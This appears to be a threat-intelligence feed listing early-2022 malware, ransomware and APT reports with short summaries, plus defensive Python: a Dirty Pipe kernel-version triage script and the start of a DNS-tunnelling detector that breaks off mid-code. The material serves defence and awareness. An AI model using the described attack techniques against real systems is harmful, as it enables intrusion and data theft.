DirtyMoe malware
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- DirtyMoe malware
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers from Avast warned of the rapid growth of the DirtyMoe botnet, which grew from 10,000 infected systems in 2020 to more than 100,000 in the first half of 2021. Avast describes DirtyMoe as complex malware designed as a modular system. The Windows botnet has been active since late 2017; it was mainly used to mine cryptocurrency but was also involved in DDoS attacks in 2018.
EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
CAKETAP Rootkit deployed by UNC2891
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- CAKETAP Rootkit deployed by UNC2891
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Security researchers from Mandiant came across a new Unix rootkit, called CAKETAP, that was used to steal ATM banking data. The rootkit was deployed by UNC2891.
Conti Gang working with IAB
MEDIUM
+
—
- Intel Source:
- Google TAG
- Intel Name:
- Conti Gang working with IAB
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Google's Threat Analysis Group (TAG) exposed the operations of a threat actor dubbed 'EXOTIC LILY', an initial access broker linked to the Conti and Diavol ransomware operations. EXOTIC LILY was first spotted exploiting a zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). Further investigation determined that EXOTIC LILY is an initial access broker that uses large-scale phishing campaigns to breach targeted corporate networks.
BlackCat and BlackMatter ransomware connection
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- BlackCat and BlackMatter ransomware connection
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers analysed the relationship between the BlackCat and BlackMatter ransomware families. They concluded with moderate confidence that the same affiliate is behind both ransomware operations, since the same C2 infrastructure was used in certain attacks.
GhostWriter New Espionage Campaign Update
MEDIUM
+
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- GhostWriter New Espionage Campaign Update
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious ZIP file containing a Microsoft Compiled HTML Help file named dovidka.chm. The file was designed to spread espionage malware against targets in Ukraine; its decoy displays the logos of the Ukrainian President's office and security services alongside advice on dealing with bombing.
LokiLocker RaaS Targets Windows Systems
MEDIUM
+
—
- Intel Source:
- Blackberry
- Intel Name:
- LokiLocker RaaS Targets Windows Systems
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers identified a new ransomware-as-a-service dubbed LokiLocker. It targets English-speaking victims on Windows and was first seen in the wild in mid-August 2021. LokiLocker encrypts the victim's files on local drives and network shares with a standard hybrid scheme: AES for file encryption and RSA to protect the AES key.
Cyclops Blink malware targets Asus Router
HIGH
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Cyclops Blink malware targets Asus Router
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- Researchers from Trend Micro analysed the technical capabilities of the Cyclops Blink malware variant that targets ASUS routers and published an extensive list of more than 150 current and historical command-and-control (C2) servers of the Cyclops Blink botnet.
Qakbot infection with Cobalt Strike and VNC
MEDIUM
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot infection with Cobalt Strike and VNC
- Date of Scan:
- 2022-03-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS have dissected
Gh0stCringe RAT targets MS-SQL and MySQL servers
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Gh0stCringe RAT targets MS-SQL and MySQL servers
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- The ASEC team analysed and monitored malware being distributed to vulnerable MySQL and MS-SQL servers; ASEC identified the malware as Gh0stCringe, also known as CirenegRAT.
WIZARD SPIDER massive phishing campaign
MEDIUM
+
—
- Intel Source:
- Prevailion
- Intel Name:
- WIZARD SPIDER massive phishing campaign
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- Earlier this year researchers at Prevailion identified a massive phishing campaign focused on harvesting the credentials of Naver users. Naver is a popular South Korean online platform, comparable to Google, that offers a variety of services (email, news and search among many others). The researchers found overlaps with infrastructure historically linked to WIZARD SPIDER, a Russia-based threat actor focused on initial access and ransomware operations.
Russian Threat Actors exploits PrintNightMare Vulnerability
HIGH
+
—
- Intel Source:
- CISA
- Intel Name:
- Russian Threat Actors exploits PrintNightMare Vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- In a joint advisory, the FBI and CISA warn organisations that Russian state-sponsored threat actors gained network access by exploiting default MFA protocols and a known vulnerability, PrintNightmare. The advisory also provides TTPs, IOCs and recommendations to protect against Russian state-sponsored malicious cyber activity.
CaddyWiper TTP_Seeder_Queries_15/03/222
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- CaddyWiper TTP_Seeder_Queries_15/03/222
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Pandora Ransomware
MEDIUM
+
—
- Intel Source:
- Cyble
- Intel Name:
- Pandora Ransomware
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Cyble Research Labs analysed a sample of Pandora ransomware. After analysing the sample, Cyble believes Pandora is a rebrand of ROOK ransomware, having observed similar behaviour in the past. The Pandora ransomware gang is suspected of using double extortion.
CaddyWiper Malware
HIGH
+
—
- Intel Source:
- ESET
- Intel Name:
- CaddyWiper Malware
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- ESET researchers identified a third wiper impacting Ukraine, dubbed CaddyWiper. Its compiled size of just 9 KB is considerably smaller than the previous wipers. This is a developing threat; currently only one hash is available.
EnemyBot - Linux based Botnet
HIGH
+
—
- Intel Source:
- Securonix
- Intel Name:
- EnemyBot - Linux based Botnet
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- Securonix Threat Labs (STL) identified a Linux-based botnet dubbed EnemyBot. STL correlates EnemyBot with the LolFMe botnet, which contains similar strings such as “watudoinglookingatdis”. EnemyBot is also able to exfiltrate data via HTTP POST; in STL's analysis the malware sent the data back to the originating IP address.
B1txor20 Botnet exploits Log4j vulnerability
MEDIUM
+
—
- Intel Source:
- netlab360
- Intel Name:
- B1txor20 Botnet exploits Log4j vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Qihoo 360's Netlab captured an ELF file on their honeypot system that was first observed propagating through the Log4j vulnerability on February 9, 2022. After analysing the file they named it B1txor20, after the file name 'b1t' used during propagation, the XOR encryption algorithm and the 20-byte RC4 key length.
Decoding Dannabot malware
LOW
+
—
- Intel Source:
- Security Soup
- Intel Name:
- Decoding Dannabot malware
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- A researcher at Security Soup wrote about a VBS-based DanaBot downloader that has added an obfuscation scheme and a few other TTPs to its arsenal.
NIGHT SPIDER Zloader Campaign
LOW
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- NIGHT SPIDER Zloader Campaign
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- CrowdStrike researchers tracked an ongoing, widespread intrusion campaign that uses bundled .msi installers to trick victims into downloading malicious payloads alongside legitimate software. The installers were used to execute NIGHT SPIDER's Zloader trojan.
North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
GrimPlant and GraphSteel used to attack Ukraine
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- GrimPlant and GraphSteel used to attack Ukraine
- Date of Scan:
- 2022-03-15
- Impact:
- MEDIUM
- Summary:
- CERT-UA identified cyberattacks launched by the UAC-0056 threat group against Ukrainian state authorities. The phishing emails, purportedly carrying instructions on improving information security, deliver an executable that leads to a Cobalt Strike beacon.
Dirty Pipe vulnerability in Linux kernel
HIGH
+
—
- Intel Source:
- SecureList
- Intel Name:
- Dirty Pipe vulnerability in Linux kernel
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- Security researcher Max Kellermann discovered a high-severity vulnerability in the Linux kernel, Dirty Pipe (CVE-2022-0847), that lets a local unprivileged user overwrite data in read-only files and can therefore be used for local privilege escalation. It affects Linux kernels from 5.8 up to, but not including, 5.16.11, 5.15.25 and 5.10.102.
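As an added example (not from the Securelist post), the following Python triages a fleet inventory of `uname -r` strings against the affected ranges stated above. The version boundaries are taken from the entry; the assumptions are that 5.17 and later released kernels ship with the fix, and that the non-LTS series between 5.8 and 5.16 (5.8, 5.9, 5.11 to 5.14) never received a fixed release because they were end-of-life upstream. Host names and release strings in the sample are constructed, and all function names are mine.

```python
import re

# First fixed patch level per upstream stable series (from the entry above).
FIRST_FIXED_PATCH = {
    (5, 16): 11,
    (5, 15): 25,
    (5, 10): 102,
}
FIRST_AFFECTED_SERIES = (5, 8)
# Assumption: the fix predates the 5.17 release, so 5.17+ is treated as fixed.
# Release candidates (e.g. "5.17-rc3") are not distinguished and parse as 5.17.0.
FIRST_UNAFFECTED_SERIES = (5, 17)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")

def parse_kernel_version(release: str):
    """Turn a `uname -r` string such as '5.15.24-1-lts' into (major, minor, patch)."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def dirty_pipe_status(release: str) -> str:
    """Classify a kernel release as 'not_affected', 'vulnerable' or 'fixed'.

    Only the upstream version number is consulted. Distribution kernels that
    backport the fix without bumping the patch level (common for Ubuntu, RHEL
    and SUSE) will be reported as 'vulnerable' here; confirm against the vendor
    advisory or a runtime test before acting on the result.
    """
    major, minor, patch = parse_kernel_version(release)
    series = (major, minor)
    if series < FIRST_AFFECTED_SERIES:
        return "not_affected"
    if series >= FIRST_UNAFFECTED_SERIES:
        return "fixed"
    first_fixed = FIRST_FIXED_PATCH.get(series)
    if first_fixed is None:
        # 5.8, 5.9, 5.11, 5.12, 5.13, 5.14: end-of-life upstream, no fixed release exists
        return "vulnerable"
    return "fixed" if patch >= first_fixed else "vulnerable"

def triage_hosts(inventory: dict) -> dict:
    """Map hostname -> status for a {hostname: uname_r} inventory."""
    return {host: dirty_pipe_status(rel) for host, rel in inventory.items()}

if __name__ == "__main__":
    # Constructed sample inventory (assumption): not real hosts.
    sample = {
        "web01": "5.10.101-1-lts",
        "web02": "5.10.102-1-lts",
        "build01": "5.15.24-1-lts",
        "build02": "5.16.11-arch1-1",
        "legacy01": "4.19.200",
        "dev01": "5.13.0-generic",
        "new01": "5.17.1",
    }
    for host, status in triage_hosts(sample).items():
        print(f"{host:10s} {sample[host]:20s} {status}")
```

Treat a "vulnerable" verdict as a prompt to check, not a conclusion: a distribution kernel reporting 5.13.0 may carry the backported fix, and the only authoritative answer for such kernels is the vendor's advisory or the package changelog.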
Sockbot in GoLand
MEDIUM
+
—
- Intel Source:
- Security Joes
- Intel Name:
- Sockbot in GoLand
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- The Security Joes incident response team responded to malicious activity in a client's network infrastructure. During the investigation they discovered that the threat actors used two customised Go-compiled Windows executables, “lsassDumper” and “Sockbot”, to carry out the attack.
Kwampirs Malware Linked to Shamoon APT
MEDIUM
+
—
- Intel Source:
- Cylera
- Intel Name:
- Kwampirs Malware Linked to Shamoon APT
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cylera Labs assesses with medium-to-high confidence that Shamoon and Kwampirs are the same group or close collaborators that have shared updates, techniques and code over multiple years. The evolution of Kwampirs and its connections to Shamoon 1 and 2 are documented in Cylera's recent report.
Brazilian trojan targets Portuguese users
LOW
+
—
- Intel Source:
- seguranca-informatica
- Intel Name:
- Brazilian trojan targets Portuguese users
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- A new variant of a Brazilian banking trojan has targeted users in Portugal; it shows no difference in sophistication compared to other well-known trojans such as Maxtrilha, URSA and Javali. The trojan has been disseminated via phishing templates impersonating tax services in Portugal.
TunnelVision exploits VMWare Horizon Servers
MEDIUM
+
—
- Intel Source:
- esentire
- Intel Name:
- TunnelVision exploits VMWare Horizon Servers
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- eSentire researchers found suspicious account creation and credential-harvesting attempts on a customer's endpoint and traced them to a VMware Horizon server. The attack was linked with high confidence to TunnelVision, an Iranian-aligned threat actor.
Remcos RAT distribution campaign take advantage of Ukraine Invasion
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Remcos RAT distribution campaign take advantage of Ukraine Invasion
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers observed threat actors using email lures themed around the Russia-Ukraine conflict, fundraising and humanitarian support. The emails are part of scam activity and deliver the Remcos RAT.
CryptBot Infostealer disguised as Cracked Software
LOW
+
—
- Intel Source:
- Blackberry
- Intel Name:
- CryptBot Infostealer disguised as Cracked Software
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- BlackBerry researchers came across a new and improved version of the CryptBot infostealer, released via compromised pirated-software sites that appear to offer “cracked” versions of popular software and video games.
Infostealer Distributed via YouTube
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer Distributed via YouTube
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- ASEC researchers discovered an infostealer being distributed via YouTube. The threat actor disguised the malware as a game hack and uploaded a video to YouTube with a download link for the malware.
Formbook/XLoader targets Ukraine Government Officials
MEDIUM
+
—
- Intel Source:
- Netskope
- Intel Name:
- Formbook/XLoader targets Ukraine Government Officials
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Netskope Threat Labs analysed a phishing email targeting high-ranking government officials in Ukraine. The email appears to be part of a new spam campaign and carries an infected spreadsheet together with a .NET executable that loads Formbook malware in a multi-stage chain.
Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers analysed the malware/tool called 'Liberator', distributed by the disBalancer group. The post has since been updated with two new IoCs.
Russian Threat Actors using Google Ad Delivery Network
MEDIUM
+
—
- Intel Source:
- NovaSOC
- Intel Name:
- Russian Threat Actors using Google Ad Delivery Network
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from NovaSOC caught Russian actors using the Google ad delivery network to establish browser connections: Russian IP addresses have been using the ad network as a mechanism to initiate client network connections.
Online Contact forms delivering BazarLoader
MEDIUM
+
—
- Intel Source:
- Abnormal
- Intel Name:
- Online Contact forms delivering BazarLoader
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cybercriminals are always looking for new ways to target users. Researchers at Abnormal Security identified attacks that reach users through a company's online contact form and observed that these attacks lead to delivery of the BazarLoader malware.
Email interjection by Qakbot
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- Email interjection by Qakbot
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Sophos Labs discovered a new Qakbot technique in which the botnet spreads by inserting malicious replies into the middle of existing email conversations. The injected message is a reply-all containing a short sentence and a link to download a ZIP file, which in turn contains a malicious Office document.
FormBook malware targets Ukrainians
MEDIUM
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook malware targets Ukrainians
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Malwarebytes researchers recently discovered a malicious spam campaign dropping the Formbook stealer and specifically targeting Ukrainians; the email lure is written in Ukrainian.
LazyScripter APT H-Worm campaign
MEDIUM
+
—
- Intel Source:
- Lab52
- Intel Name:
- LazyScripter APT H-Worm campaign
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Lab52 tracked the activity of the LazyScripter APT and discovered new malware and new infrastructure in the LazyScripter arsenal. Further analysis found that the group uses a popular open-source online script obfuscation tool, into whose output it injects its own downloader for njRAT.
MuddyWater subgroup leveraging maldocs and RATs
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater subgroup leveraging maldocs and RATs
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cisco Talos believes with high confidence that sub-groups operating under the MuddyWater umbrella are targeting Turkey and countries on the Arabian Peninsula with maldocs and a Windows Script File based RAT. These subgroups are highly motivated to conduct espionage, steal intellectual property, and implant malware and ransomware in targeted networks.
Disguised malware exploit Ukrainian sympathizers
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Threat actors are attempting to exploit Ukrainian sympathisers by offering malware disguised as cyber tools for targeting Russian entities. Cisco Talos analysed one such instance, in which a threat actor offered a DDoS tool on Telegram for attacking Russian websites; the downloaded file turned out to be infostealer malware.
Racoon Stealer leverages Telegram
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- Racoon Stealer leverages Telegram
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Avast researchers recently observed Raccoon Stealer, a password-stealing malware, using Telegram infrastructure to store and update its current C&C addresses. Raccoon Stealer is distributed via the Buer Loader and GCleaner downloaders.
Prometheus Ransomware Decrypted
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- Prometheus Ransomware Decrypted
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Avast researchers have released a decryptor for Prometheus ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Conti Ransomware Indicator of Compromise
HIGH
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- Conti Ransomware Indicator of Compromise
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- A joint advisory released by the FBI, NSA and CISA details updated indicators of compromise for Conti ransomware and the operators' TTPs. Conti remains very active and has used TrickBot and Cobalt Strike in its attacks.
Emotet Resurgence
HIGH
+
—
- Intel Source:
- Lumen
- Intel Name:
- Emotet Resurgence
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- The infamous Emotet malware, which returned in November 2021 after a ten-month gap, is once again showing signs of steady growth. Researchers at Lumen's Black Lotus Labs observed a strong resurgence of Emotet, with 130,000 unique bots spread across 179 countries since its return.
UNC1151_TTP_Seeder_Queries_070322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- UNC1151_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Agent Tesla RAT campiagn
HIGH
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Agent Tesla RAT campiagn
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- FortiGuard Labs analysed a phishing email impersonating a Ukraine-based materials and chemical manufacturing company sharing a purchase order. The email carries a PowerPoint attachment that starts a multi-stage effort to deploy the Agent Tesla RAT.
GhostWriter New Espionage Campaign
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter New Espionage Campaign
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious ZIP file containing a Microsoft Compiled HTML Help file named dovidka.chm. The file was designed to spread espionage malware against targets in Ukraine; its decoy displays the logos of the Ukrainian President's office and security services alongside advice on dealing with bombing.
APT41_TTP_Seeder_Queries_070322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- APT41_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
RURansom Wiper Targets Russia
LOW
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- RURansom Wiper Targets Russia
- Date of Scan:
- 2022-03-09
- Impact:
- LOW
- Summary:
- Trend Micro researchers analysed a sample released by MalwareHunterTeam which, according to them, is a wiper disguised as ransomware and targets Russia. The malware is written in .NET and spreads as a worm.
APT41 targeting US Government
HIGH
+
—
- Intel Source:
- Mandiant
- Intel Name:
- APT41 targeting US Government
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- Mandiant researchers became aware of a campaign in May 2021 when they were called in to investigate an attack on a US state government network. Analysis revealed that the attack was likely carried out by the Chinese nation-state group APT41. Mandiant has confirmed that the group compromised the networks of at least six U.S. state government organisations between May 2021 and February 2022.
Nokoyawa Ransomware linked to Hive
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Nokoyawa Ransomware linked to Hive
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- Trend Micro researchers came across a new ransomware, Nokoyawa, with similarities to Hive ransomware, from the attack chain and the tools used to the order in which the various steps are executed. Most of the ransomware's targets are located in South America.
RagnarLocker Ransomware IoCs
MEDIUM
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- RagnarLocker Ransomware IoCs
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The Federal Bureau of Investigation (FBI) published a new FLASH report providing additional IOCs associated with RagnarLocker ransomware. The FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker.
Emotet recent campaign using MS Excel
HIGH
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Emotet recent campaign using MS Excel
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Fortinet researchers conducted deep research on 500 Excel files involved in delivering the Emotet trojan. They analysed the Excel file used to spread Emotet, the anti-analysis techniques it uses, how it persists on the victim's device and communicates with C2 servers, and how modules are delivered, loaded and executed on the target system.
Webhards distributing njRAT
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Webhards distributing njRAT
- Date of Scan:
- 2022-03-08
- Impact:
- LOW
- Summary:
- ASEC researchers identified njRAT malware being distributed through webhards. Webhards are file-sharing platforms that attackers frequently use to distribute malware, mainly to target Korean users; in this case the malware was disguised as an adult game uploaded to a webhard.
Threat Landscape around Ukraine
MEDIUM
+
—
- Intel Source:
- Google TAG
- Intel Name:
- Threat Landscape around Ukraine
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The Google Threat Analysis Group (TAG) observed phishing campaigns and espionage activity from a range of threat actors, including FancyBear (APT28) and Ghostwriter, targeting Ukraine. Activity from Mustang Panda was also noted.
PROPHET SPIDER Exploits Citrix ShareFile
MEDIUM
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- PROPHET SPIDER Exploits Citrix ShareFile
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The CrowdStrike Intelligence team investigated an incident in which PROPHET SPIDER targeted a Microsoft IIS server by exploiting CVE-2021-22941, a vulnerability in Citrix ShareFile Storage Zones Controller. PROPHET SPIDER, first spotted in May 2017, typically gains initial access to targeted networks by compromising vulnerable web servers.
TA416 targets European Government
HIGH
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA416 targets European Government
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Researchers at Proofpoint discovered the threat group TA416 targeting European diplomatic entities, including individuals involved in refugee and migrant services. TA416 is assessed to be aligned with the Chinese state and uses web bugs embedded in its emails to profile targets before delivering malware. Researchers noted that the campaign has escalated since tensions rose between Russia, Ukraine and NATO members in Europe.
FormBook targets Oil & Gas companies
MEDIUM
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook targets Oil & Gas companies
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- During routine intel gathering we identified a tweet from Malwarebytes Threat Intelligence stating that FormBook continues to target oil and gas companies, along with potential IoCs. A few hours later Malwarebytes published a blog post with its findings. The campaign was delivered by a targeted email containing two attachments, a PDF file and an Excel document.
Global credential harvesting campaign
MEDIUM
+
—
- Intel Source:
- Curated Intel
- Intel Name:
- Global credential harvesting campaign
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Curated Intelligence recently tracked a new global credential harvesting campaign targeting Microsoft accounts through a range of phishing emails masquerading as ‘shared document’ notifications which deliver an embedded URL that leads to a fake Adobe Document Cloud application login page.
AvosLocker group new variant targets Linux systems
MEDIUM
+
—
- Intel Source:
- Qualys
- Intel Name:
- AvosLocker group new variant targets Linux systems
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- The AvosLocker ransomware group first appeared in June 2021 targeting Windows machines. Researchers at Qualys have now identified that the group is also targeting Linux environments: on its dark web leak site AvosLocker advertises its latest ransomware variants and states that it has added support for encrypting Linux systems, specifically targeting VMware ESXi virtual machines.
Cyber campaign against Indian Government
LOW
+
—
- Intel Source:
- Telsy
- Intel Name:
- Cyber campaign against Indian Government
- Date of Scan:
- 2022-03-07
- Impact:
- LOW
- Summary:
- Researchers from Telsy identified a spear-phishing campaign targeting the Indian government. The threat actors use legitimate web portals as C2 with encrypted HTTPS communication; legitimate sites were used as Cobalt Strike C&C.
Multi malware campaign on Ukraine
HIGH
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Multi malware campaign on Ukraine
- Date of Scan:
- 2022-03-04
- Impact:
- HIGH
- Summary:
- Trend Micro Research verified and validated a number of alleged cyberattacks carried out by multiple groups in support of either Russia or Ukraine. The researchers analysed internal data and external reports to compile this information.
Domains Linked to Phishing Attacks Targeting Ukraine
MEDIUM
+
—
- Intel Source:
- SecureWorks
- Intel Name:
- Domains Linked to Phishing Attacks Targeting Ukraine
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureWorks CTU investigated a warning published by CERT-UA on 25 February 2022 regarding phishing attacks targeting Ukrainian military personnel and government. CTU attributes the campaign to the MOONSCAPE threat group, whereas CERT-UA attributes it to UNC1151, an APT group linked to the Belarusian government.
DanaBot attacks Ukrainian MOD
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- DanaBot attacks Ukrainian MOD
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- On 2 March 2022, in the midst of the Russia-Ukraine conflict, Zscaler identified a threat actor launching an HTTP-based DDoS attack against the Ukrainian Ministry of Defense's webmail server. The attacker used DanaBot to launch the DDoS attack and to deliver a second-stage malware payload via DanaBot's download-and-execute command.
Russia-Ukraine Conflict Leverages Phishing Themes
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- Russia-Ukraine Conflict Leverages Phishing Themes
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- With the Russia-Ukraine conflict being fought on the ground and on the cyber front simultaneously, the Cofense Phishing Defense Center is monitoring phishing emails related to the conflict and has identified malicious campaigns using it as a lure to target users and enterprises. Cofense does not, however, have evidence to attribute these phishing campaigns to the countries directly involved in the war.
DDoS botnets cryptominers exploits Log4shell
MEDIUM
+
—
- Intel Source:
- Barracuda
- Intel Name:
- DDoS botnets cryptominers exploits Log4shell
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Barracuda researchers analysed botnets and cryptominers exploiting the Log4Shell vulnerability, activity they have observed at a constant level for two months. The majority of attacks came from IP addresses in the U.S., about half of them associated with AWS, Azure and other data centres.
Vollgar CoinMiner targets MSSQL
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Vollgar CoinMiner targets MSSQL
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at ASEC are monitoring a specific CoinMiner that is being consistently distributed to vulnerable MS-SQL servers; ASEC's infrastructure has detected Vollgar CoinMiner samples in its logs. Vollgar is a typical CoinMiner installed via brute-force attacks against MS-SQL servers with weak account credentials.
TrickBot upgrades AnchorDNS Backdoor
MEDIUM
+
—
- Intel Source:
- Security Intelligence
- Intel Name:
- TrickBot upgrades AnchorDNS Backdoor
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at IBM discovered an updated version of the Trickbot group's AnchorDNS backdoor being used in recent attacks that ended with the deployment of Conti ransomware. AnchorDNS is notable for communicating with its command-and-control (C2) server over the DNS protocol.
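A backdoor that talks to its C2 over DNS has to smuggle data through query names, which leaves a measurable trace: many distinct, long, high-entropy subdomains under one registered domain. The following is an added example of that detection heuristic, written for this page and not code from IBM or from the AnchorDNS analysis; it does not model AnchorDNS's actual encoding. The log line format, the domain names, the client IPs and the thresholds are all constructed assumptions, and the registered-domain split is a crude last-two-labels rule (use a public-suffix list in production).

```python
import math
import re
from collections import defaultdict

# Constructed resolver log layout (assumption): "<timestamp> <client_ip> <qtype> <qname>"
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")


def shannon_entropy(s):
    """Bits per character. Encoded beacon data (hex/base32) sits near 3.5-4.5;
    ordinary hostnames such as 'www' or 'mail' sit near 0-2.5."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


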